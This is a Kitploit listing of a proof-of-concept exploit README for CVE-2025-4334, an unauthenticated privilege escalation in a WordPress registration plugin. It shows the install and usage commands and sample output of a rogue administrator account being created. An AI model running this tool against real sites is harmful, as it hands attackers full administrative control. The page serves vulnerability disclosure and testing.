Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-4334 — Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts. | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.

View Repository
41711 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

WordPress Logo

CVE-2025-4334 - Simple User Registration <= 6.3 Unauthenticated Privilege Escalation

Exploit Title: Simple User Registration <= 6.3 – Unauthenticated Privilege Escalation Author: Gaurav Bhattacharjee (0xgh057r3c0n) CVE ID: CVE-2025-4334

This exploit targets a vulnerability in the Simple User Registration plugin for WordPress (<= v6.3), allowing unauthenticated attackers to escalate privileges and create a new administrator account.


⚙️ Installation

Clone the repository and install the required Python dependencies:

git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Dependencies:

  • requests
  • colorama

🚀 Usage

python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Arguments:

  • -u / --url → Base WordPress URL (e.g. https://target.com/wordpress/)
  • --form → Full URL of the registration form (e.g. https://target.com/wpr/default-registration/)

Example:

python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Sample Output

[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Disclaimer

This tool is provided for educational and research purposes only. Unauthorized use against systems without permission is illegal. The author takes no responsibility for misuse.


📄 License

This project is licensed under the MIT License.


Download Tool